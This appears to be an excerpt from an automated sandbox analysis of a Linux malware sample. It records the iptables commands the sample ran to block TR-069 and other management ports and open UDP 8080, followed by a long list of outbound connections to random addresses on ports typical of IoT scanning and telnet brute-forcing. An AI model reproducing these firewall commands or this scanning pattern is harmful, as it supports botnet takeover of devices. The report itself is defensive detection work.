                Source: /bin/sh (PID: 4986)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4992)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5015)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5042)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5063)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5071)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5095)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5119)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5139)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5158)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5167)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5194)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
                Source: /bin/sh (PID: 5215)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5229)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5253)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
                Source: /bin/sh (PID: 5265)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 52478 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 53350 -> 8443
                Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 54390 -> 49152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 54390
                Source: global trafficTCP traffic: 192.168.2.20:50800 -> 173.128.113.111:7574
                Source: global trafficTCP traffic: 192.168.2.20:52994 -> 151.70.88.212:5555
                Source: global trafficTCP traffic: 192.168.2.20:40582 -> 37.127.116.2:52869
                Source: global trafficTCP traffic: 192.168.2.20:49692 -> 73.213.225.252:8443
                Source: global trafficTCP traffic: 192.168.2.20:44244 -> 164.95.80.124:8443
                Source: global trafficTCP traffic: 192.168.2.20:43214 -> 65.119.165.128:7574
                Source: global trafficTCP traffic: 192.168.2.20:41268 -> 112.60.138.223:7574
                Source: global trafficTCP traffic: 192.168.2.20:49422 -> 54.72.49.99:52869
                Source: global trafficTCP traffic: 192.168.2.20:43636 -> 159.134.45.88:8443
                Source: global trafficTCP traffic: 192.168.2.20:40086 -> 169.108.151.225:8443
                Source: global trafficTCP traffic: 192.168.2.20:58250 -> 46.69.243.160:81
                Source: global trafficTCP traffic: 192.168.2.20:50540 -> 45.71.81.134:37215
                Source: global trafficTCP traffic: 192.168.2.20:42756 -> 187.65.235.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:47538 -> 133.182.208.68:8443
                Source: global trafficTCP traffic: 192.168.2.20:59888 -> 65.169.70.71:5555
                Source: global trafficTCP traffic: 192.168.2.20:52378 -> 96.200.64.71:7574
                Source: global trafficTCP traffic: 192.168.2.20:53936 -> 99.231.44.225:8080
                Source: global trafficTCP traffic: 192.168.2.20:40382 -> 88.83.215.123:5555
                Source: global trafficTCP traffic: 192.168.2.20:60188 -> 112.188.233.56:7574
                Source: global trafficTCP traffic: 192.168.2.20:33888 -> 177.228.76.105:5555
                Source: global trafficTCP traffic: 192.168.2.20:38378 -> 196.250.243.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:60388 -> 151.160.250.99:37215
                Source: global trafficTCP traffic: 192.168.2.20:36256 -> 141.215.180.231:52869
                Source: global trafficTCP traffic: 192.168.2.20:52424 -> 53.12.181.226:7574
                Source: global trafficTCP traffic: 192.168.2.20:35830 -> 72.240.24.193:52869
                Source: global trafficTCP traffic: 192.168.2.20:48832 -> 168.237.187.123:5555
                Source: global trafficTCP traffic: 192.168.2.20:58328 -> 60.222.236.176:8080
                Source: global trafficTCP traffic: 192.168.2.20:57698 -> 45.220.233.11:8080
                Source: global trafficTCP traffic: 192.168.2.20:39368 -> 188.61.141.250:49152
                Source: global trafficTCP traffic: 192.168.2.20:53682 -> 189.51.61.124:5555
                Source: global trafficTCP traffic: 192.168.2.20:53168 -> 82.32.209.151:8443
                Source: global trafficTCP traffic: 192.168.2.20:53620 -> 54.139.218.167:5555
                Source: global trafficTCP traffic: 192.168.2.20:39316 -> 54.194.243.156:49152
                Source: global trafficTCP traffic: 192.168.2.20:33798 -> 161.170.180.99:81
                Source: global trafficTCP traffic: 192.168.2.20:54032 -> 219.190.141.219:8080
                Source: global trafficTCP traffic: 192.168.2.20:45228 -> 102.247.160.88:52869
                Source: global trafficTCP traffic: 192.168.2.20:57020 -> 178.236.3.160:8443
                Source: global trafficTCP traffic: 192.168.2.20:44548 -> 42.112.107.113:81
                Source: global trafficTCP traffic: 192.168.2.20:52310 -> 214.58.190.175:8080
                Source: global trafficTCP traffic: 192.168.2.20:59932 -> 15.81.245.80:37215
                Source: global trafficTCP traffic: 192.168.2.20:60906 -> 3.31.11.51:52869
                Source: global trafficTCP traffic: 192.168.2.20:38286 -> 8.231.233.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:50754 -> 161.95.111.90:8080
                Source: global trafficTCP traffic: 192.168.2.20:49450 -> 115.251.170.50:8443
                Source: global trafficTCP traffic: 192.168.2.20:40136 -> 21.210.48.60:5555
                Source: global trafficTCP traffic: 192.168.2.20:37408 -> 19.228.27.33:8080
                Source: global trafficTCP traffic: 192.168.2.20:59548 -> 198.75.210.198:7574
                Source: global trafficTCP traffic: 192.168.2.20:57734 -> 157.111.93.206:5555
                Source: global trafficTCP traffic: 192.168.2.20:53854 -> 8.191.54.125:37215
                Source: global trafficTCP traffic: 192.168.2.20:36222 -> 83.169.154.146:8443
                Source: global trafficTCP traffic: 192.168.2.20:40470 -> 28.20.175.209:81
                Source: global trafficTCP traffic: 192.168.2.20:54056 -> 11.0.46.244:49152
                Source: global trafficTCP traffic: 192.168.2.20:50054 -> 46.138.124.14:49152
                Source: global trafficTCP traffic: 192.168.2.20:55876 -> 48.57.169.235:37215
                Source: global trafficTCP traffic: 192.168.2.20:38722 -> 188.76.169.197:8080
                Source: global trafficTCP traffic: 192.168.2.20:51776 -> 54.214.12.70:5555
                Source: global trafficTCP traffic: 192.168.2.20:40314 -> 222.36.210.127:37215
                Source: global trafficTCP traffic: 192.168.2.20:59114 -> 202.164.221.195:49152
                Source: global trafficTCP traffic: 192.168.2.20:50036 -> 119.17.3.130:49152
                Source: global trafficTCP traffic: 192.168.2.20:57186 -> 215.110.247.154:52869
                Source: global trafficTCP traffic: 192.168.2.20:57952 -> 118.183.105.53:8443
                Source: global trafficTCP traffic: 192.168.2.20:33232 -> 27.46.25.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:36872 -> 62.237.39.27:49152
                Source: global trafficTCP traffic: 192.168.2.20:60776 -> 174.11.178.210:5555
                Source: global trafficTCP traffic: 192.168.2.20:38918 -> 164.156.119.109:8080
                Source: global trafficTCP traffic: 192.168.2.20:56754 -> 185.95.199.80:8080
                Source: global trafficTCP traffic: 192.168.2.20:42484 -> 88.64.5.249:8080
                Source: global trafficTCP traffic: 192.168.2.20:59846 -> 202.171.192.205:7574
                Source: global trafficTCP traffic: 192.168.2.20:58760 -> 194.243.234.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:46986 -> 76.5.175.91:7574
                Source: global trafficTCP traffic: 192.168.2.20:52502 -> 160.189.168.11:37215
                Source: global trafficTCP traffic: 192.168.2.20:60458 -> 184.133.154.232:8080
                Source: global trafficTCP traffic: 192.168.2.20:43954 -> 46.110.225.126:8080
                Source: global trafficTCP traffic: 192.168.2.20:34068 -> 122.76.30.28:8080
                Source: global trafficTCP traffic: 192.168.2.20:50900 -> 146.5.176.64:49152
                Source: global trafficTCP traffic: 192.168.2.20:47640 -> 137.225.108.177:49152
                Source: global trafficTCP traffic: 192.168.2.20:37910 -> 162.72.144.200:8443
                Source: global trafficTCP traffic: 192.168.2.20:44098 -> 14.137.108.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:55294 -> 103.208.59.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:49854 -> 175.79.49.111:52869
                Source: global trafficTCP traffic: 192.168.2.20:51114 -> 184.195.78.194:5555
                Source: global trafficTCP traffic: 192.168.2.20:50090 -> 195.254.187.23:8080
                Source: global trafficTCP traffic: 192.168.2.20:39760 -> 62.217.214.44:8080
                Source: global trafficTCP traffic: 192.168.2.20:51876 -> 198.26.185.1:49152
                Source: global trafficTCP traffic: 192.168.2.20:44500 -> 90.59.150.212:5555
                Source: global trafficTCP traffic: 192.168.2.20:40216 -> 57.50.30.157:49152
                Source: global trafficTCP traffic: 192.168.2.20:56508 -> 196.8.192.224:8080
                Source: global trafficTCP traffic: 192.168.2.20:43366 -> 85.122.252.148:8443
                Source: global trafficTCP traffic: 192.168.2.20:43488 -> 137.142.227.113:37215
                Source: global trafficTCP traffic: 192.168.2.20:33858 -> 220.186.175.16:5555
                Source: global trafficTCP traffic: 192.168.2.20:48744 -> 11.151.211.21:8443
                Source: global trafficTCP traffic: 192.168.2.20:35056 -> 99.22.46.253:81
                Source: global trafficTCP traffic: 192.168.2.20:51026 -> 194.63.219.69:81
                Source: global trafficTCP traffic: 192.168.2.20:41328 -> 22.104.172.87:8080
                Source: global trafficTCP traffic: 192.168.2.20:37098 -> 125.45.4.232:7574
                Source: global trafficTCP traffic: 192.168.2.20:57546 -> 84.183.159.213:37215
                Source: global trafficTCP traffic: 192.168.2.20:45660 -> 77.125.39.19:7574
                Source: global trafficTCP traffic: 192.168.2.20:39476 -> 81.227.254.8:8080
                Source: global trafficTCP traffic: 192.168.2.20:58714 -> 186.124.130.151:8443
                Source: global trafficTCP traffic: 192.168.2.20:44310 -> 135.13.251.193:8443
                Source: global trafficTCP traffic: 192.168.2.20:58216 -> 49.240.54.114:49152
                Source: global trafficTCP traffic: 192.168.2.20:55714 -> 97.149.39.21:52869
                Source: global trafficTCP traffic: 192.168.2.20:44856 -> 145.201.199.95:8080
                Source: global trafficTCP traffic: 192.168.2.20:54518 -> 145.243.250.38:8080
                Source: global trafficTCP traffic: 192.168.2.20:46072 -> 53.140.123.217:8443
                Source: global trafficTCP traffic: 192.168.2.20:53028 -> 46.29.166.221:8080
                Source: global trafficTCP traffic: 192.168.2.20:44150 -> 96.117.90.192:8080
                Source: global trafficTCP traffic: 192.168.2.20:47674 -> 44.173.210.161:8080
                Source: global trafficTCP traffic: 192.168.2.20:44056 -> 131.108.171.195:5555
                Source: global trafficTCP traffic: 192.168.2.20:47758 -> 7.133.161.69:37215
                Source: global trafficTCP traffic: 192.168.2.20:60334 -> 209.224.95.250:8443
                Source: global trafficTCP traffic: 192.168.2.20:40270 -> 63.27.192.49:8080
                Source: global trafficTCP traffic: 192.168.2.20:46282 -> 112.36.7.254:37215
                Source: global trafficTCP traffic: 192.168.2.20:36712 -> 35.42.181.95:8443
                Source: global trafficTCP traffic: 192.168.2.20:37028 -> 85.34.73.210:5555
                Source: global trafficTCP traffic: 192.168.2.20:36212 -> 205.214.189.164:8443
                Source: global trafficTCP traffic: 192.168.2.20:57058 -> 69.153.253.195:49152
                Source: global trafficTCP traffic: 192.168.2.20:46398 -> 54.39.218.76:37215
                Source: global trafficTCP traffic: 192.168.2.20:42590 -> 199.22.238.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:50434 -> 183.247.34.112:81
                Source: global trafficTCP traffic: 192.168.2.20:33194 -> 26.17.1.11:8080
                Source: global trafficTCP traffic: 192.168.2.20:38044 -> 91.193.93.252:52869
                Source: global trafficTCP traffic: 192.168.2.20:59878 -> 47.167.153.49:52869
                Source: global trafficTCP traffic: 192.168.2.20:53416 -> 37.157.134.82:8080
                Source: global trafficTCP traffic: 192.168.2.20:59302 -> 65.218.226.124:7574
                Source: global trafficTCP traffic: 192.168.2.20:39006 -> 133.225.142.204:8443
                Source: global trafficTCP traffic: 192.168.2.20:45766 -> 33.33.197.233:52869
                Source: global trafficTCP traffic: 192.168.2.20:56848 -> 57.2.217.0:5555
                Source: global trafficTCP traffic: 192.168.2.20:36556 -> 114.208.194.52:8080
                Source: global trafficTCP traffic: 192.168.2.20:47474 -> 168.155.124.28:81
                Source: global trafficTCP traffic: 192.168.2.20:44738 -> 200.70.157.247:8080
                Source: global trafficTCP traffic: 192.168.2.20:52742 -> 18.22.126.190:8443
                Source: global trafficTCP traffic: 192.168.2.20:33038 -> 162.168.17.49:7574
                Source: global trafficTCP traffic: 192.168.2.20:36808 -> 116.26.35.18:52869
                Source: global trafficTCP traffic: 192.168.2.20:41998 -> 19.224.127.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:33120 -> 33.247.46.190:8080
                Source: global trafficTCP traffic: 192.168.2.20:57164 -> 19.94.113.230:8080
                Source: global trafficTCP traffic: 192.168.2.20:58236 -> 66.156.43.17:52869
                Source: global trafficTCP traffic: 192.168.2.20:38722 -> 5.144.31.210:37215
                Source: global trafficTCP traffic: 192.168.2.20:33704 -> 65.59.81.254:8443
                Source: global trafficTCP traffic: 192.168.2.20:45044 -> 111.147.154.242:8080
                Source: global trafficTCP traffic: 192.168.2.20:58678 -> 42.247.127.116:8443
                Source: global trafficTCP traffic: 192.168.2.20:35152 -> 13.143.231.12:8080
                Source: global trafficTCP traffic: 192.168.2.20:57278 -> 18.196.100.83:8080
                Source: global trafficTCP traffic: 192.168.2.20:54076 -> 144.171.238.211:81
                Source: global trafficTCP traffic: 192.168.2.20:51050 -> 18.149.58.148:8080
                Source: global trafficTCP traffic: 192.168.2.20:38730 -> 122.139.195.181:8080
                Source: global trafficTCP traffic: 192.168.2.20:54690 -> 184.225.49.232:52869
                Source: global trafficTCP traffic: 192.168.2.20:55844 -> 19.35.22.33:52869
                Source: global trafficTCP traffic: 192.168.2.20:40502 -> 210.120.216.194:8080
                Source: global trafficTCP traffic: 192.168.2.20:39164 -> 31.69.24.163:81
                Source: global trafficTCP traffic: 192.168.2.20:44118 -> 189.16.44.51:37215
                Source: global trafficTCP traffic: 192.168.2.20:33812 -> 35.197.143.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:48974 -> 69.107.161.237:37215
                Source: global trafficTCP traffic: 192.168.2.20:59348 -> 67.97.143.243:8443
                Source: global trafficTCP traffic: 192.168.2.20:59968 -> 59.141.161.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:36518 -> 160.161.138.92:8443
                Source: global trafficTCP traffic: 192.168.2.20:43408 -> 185.169.150.24:8080
                Source: global trafficTCP traffic: 192.168.2.20:59912 -> 195.8.49.55:81
                Source: global trafficTCP traffic: 192.168.2.20:48298 -> 186.144.158.222:7574
                Source: global trafficTCP traffic: 192.168.2.20:59652 -> 215.122.80.92:49152
                Source: global trafficTCP traffic: 192.168.2.20:33622 -> 183.30.162.72:52869
                Source: global trafficTCP traffic: 192.168.2.20:42074 -> 208.77.218.190:8080
                Source: global trafficTCP traffic: 192.168.2.20:58454 -> 19.110.225.46:8080
                Source: global trafficTCP traffic: 192.168.2.20:35942 -> 91.192.83.22:37215
                Source: global trafficTCP traffic: 192.168.2.20:48822 -> 146.31.191.38:49152
                Source: global trafficTCP traffic: 192.168.2.20:58146 -> 81.192.248.54:8080
                Source: global trafficTCP traffic: 192.168.2.20:42694 -> 220.112.131.158:49152
                Source: global trafficTCP traffic: 192.168.2.20:54502 -> 12.121.21.175:49152
                Source: global trafficTCP traffic: 192.168.2.20:48304 -> 93.252.183.105:5555
                Source: global trafficTCP traffic: 192.168.2.20:40482 -> 169.153.122.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:37676 -> 45.175.32.225:7574
                Source: global trafficTCP traffic: 192.168.2.20:55092 -> 175.116.229.144:8443
                Source: global trafficTCP traffic: 192.168.2.20:40358 -> 1.229.142.252:8080
                Source: global trafficTCP traffic: 192.168.2.20:55158 -> 161.55.227.176:8080
                Source: global trafficTCP traffic: 192.168.2.20:40944 -> 3.54.72.115:8443
                Source: global trafficTCP traffic: 192.168.2.20:60000 -> 211.130.169.58:52869
                Source: global trafficTCP traffic: 192.168.2.20:58138 -> 71.189.125.136:8080
                Source: global trafficTCP traffic: 192.168.2.20:52926 -> 35.134.65.144:5555
                Source: global trafficTCP traffic: 192.168.2.20:53140 -> 81.185.164.190:49152
                Source: global trafficTCP traffic: 192.168.2.20:58740 -> 68.38.131.19:8443
                Source: global trafficTCP traffic: 192.168.2.20:48186 -> 158.215.177.9:7574
                Source: global trafficTCP traffic: 192.168.2.20:33492 -> 21.71.60.36:52869
                Source: global trafficTCP traffic: 192.168.2.20:41634 -> 15.139.248.72:8080
                Source: global trafficTCP traffic: 192.168.2.20:59812 -> 52.173.108.207:8080
                Source: global trafficTCP traffic: 192.168.2.20:59544 -> 14.27.221.29:8080
                Source: global trafficTCP traffic: 192.168.2.20:50294 -> 200.160.26.61:37215
                Source: global trafficTCP traffic: 192.168.2.20:58298 -> 117.0.115.227:52869
                Source: global trafficTCP traffic: 192.168.2.20:55566 -> 72.204.193.69:37215
                Source: global trafficTCP traffic: 192.168.2.20:60458 -> 88.55.10.218:8080
                Source: global trafficTCP traffic: 192.168.2.20:55866 -> 173.95.216.55:5555
                Source: global trafficTCP traffic: 192.168.2.20:39734 -> 131.6.224.238:8080
                Source: global trafficTCP traffic: 192.168.2.20:52616 -> 108.58.115.194:49152
                Source: global trafficTCP traffic: 192.168.2.20:58152 -> 217.28.121.124:8080
                Source: global trafficTCP traffic: 192.168.2.20:41218 -> 176.24.193.254:7574
                Source: global trafficTCP traffic: 192.168.2.20:47630 -> 107.15.195.209:8443
                Source: global trafficTCP traffic: 192.168.2.20:37986 -> 132.224.19.35:8080
                Source: global trafficTCP traffic: 192.168.2.20:39588 -> 85.4.13.35:52869
                Source: global trafficTCP traffic: 192.168.2.20:44530 -> 114.116.30.250:7574
                Source: global trafficTCP traffic: 192.168.2.20:44300 -> 13.23.175.71:81
                Source: global trafficTCP traffic: 192.168.2.20:40322 -> 209.49.249.153:8443
                Source: global trafficTCP traffic: 192.168.2.20:42126 -> 89.192.178.91:37215
                Source: global trafficTCP traffic: 192.168.2.20:44606 -> 61.175.55.132:8443
                Source: global trafficTCP traffic: 192.168.2.20:54536 -> 167.174.7.212:8080
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 154.18.253.69:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 42.157.134.10:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 108.74.215.207:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 216.157.116.109:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 121.147.101.239:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 191.216.64.228:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 187.25.8.99:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 210.225.37.119:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 173.191.26.173:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 107.5.252.208:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 180.196.64.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 184.90.217.19:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 66.169.135.72:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 153.43.5.52:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 20.10.172.16:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 24.173.204.79:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 40.231.251.18:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 44.125.192.91:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 185.199.252.8:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 202.222.248.221:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 65.76.58.171:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 97.152.241.251:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 92.140.135.135:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 221.79.125.189:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 97.19.93.192:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 112.208.55.3:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 74.181.98.131:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 146.221.115.228:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 147.32.87.2:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 188.213.166.122:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 158.198.126.211:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 221.11.44.192:2323
                Source: global trafficTCP traffic: 192.168.2.20:45980 -> 206.215.160.208:8443
                Source: global trafficTCP traffic: 192.168.2.20:60230 -> 194.134.230.15:8080
                Source: global trafficTCP traffic: 192.168.2.20:33288 -> 168.62.179.106:8080
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 186.129.59.209:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 183.39.114.210:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 69.160.36.31:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 41.208.87.109:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 19.1.83.59:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 189.83.101.94:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 89.211.68.0:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 40.110.214.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 187.48.184.226:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 112.253.107.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 12.145.180.4:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 151.11.34.204:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 70.130.42.81:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 4.110.27.220:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 160.227.213.97:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 187.190.81.26:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 107.61.226.20:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 212.252.174.236:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 12.233.123.43:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 153.192.241.136:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 147.166.248.166:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 223.87.220.29:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 13.152.241.242:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 121.61.31.17:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 63.253.84.254:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 86.185.251.149:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 8.92.251.48:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 211.32.153.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 203.0.21.109:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 72.221.8.246:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 202.213.206.179:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 35.117.35.167:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 151.194.99.188:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 212.103.236.147:2323
                Source: global trafficTCP traffic: 192.168.2.20:36064 -> 47.145.217.113:5555
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 212.219.62.189:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 206.123.155.195:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 76.92.182.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 36.33.205.198:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 38.157.124.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 58.155.188.76:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 113.44.78.247:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 97.68.83.8:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 121.99.87.167:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 87.22.241.41:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 178.95.227.170:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 118.211.78.213:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 151.87.97.55:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 209.66.123.242:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 27.255.154.108:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 176.242.102.183:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 146.35.33.184:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 65.77.77.241:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 219.122.59.104:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 101.118.160.184:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 81.54.132.55:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 175.223.210.199:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 191.15.46.25:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 168.145.68.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 38.29.8.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 84.255.39.9:1023
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 175.61.243.196:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 100.134.61.27:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 217.93.0.20:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 79.65.71.65:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 20.167.158.223:2323
                Source: global trafficTCP traffic: 192.168.2.20:15042 -> 74.118.105.34:2323
                Source: global trafficTCP traffic: 192.168.2.20:42434 -> 187.254.232.94:8443
                Source: global trafficTCP traffic: 192.168.2.20:43764 -> 207.11.230.122:8080
                Source: global trafficTCP traffic: 192.168.2.20:48034 -> 19.134.158.13:8080
                Source: global trafficTCP traffic: 192.168.2.20:48348 -> 44.61.11.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:48496 -> 178.113.43.27:7574
                Source: global trafficTCP traffic: 192.168.2.20:50444 -> 123.219.44.5:81
                Source: global trafficTCP traffic: 192.168.2.20:48516 -> 89.233.76.116:8080
                Source: global trafficTCP traffic: 192.168.2.20:39274 -> 149.212.141.67:52869
                Source: global trafficTCP traffic: 192.168.2.20:50534 -> 211.137.192.96:8080
                Source: global trafficTCP traffic: 192.168.2.20:59440 -> 88.201.76.34:7574
                Source: global trafficTCP traffic: 192.168.2.20:53588 -> 79.165.147.138:5555
                Source: global trafficTCP traffic: 192.168.2.20:35806 -> 37.229.199.107:8443
                Source: global trafficTCP traffic: 192.168.2.20:60106 -> 190.174.62.228:7574
                Source: global trafficTCP traffic: 192.168.2.20:54834 -> 40.19.224.212:8080
                Source: global trafficTCP traffic: 192.168.2.20:59008 -> 196.13.229.215:52869
                Source: global trafficTCP traffic: 192.168.2.20:36360 -> 101.193.149.11:81
                Source: global trafficTCP traffic: 192.168.2.20:50182 -> 148.157.191.210:49152
                Source: global trafficTCP traffic: 192.168.2.20:36990 -> 146.151.247.1:52869
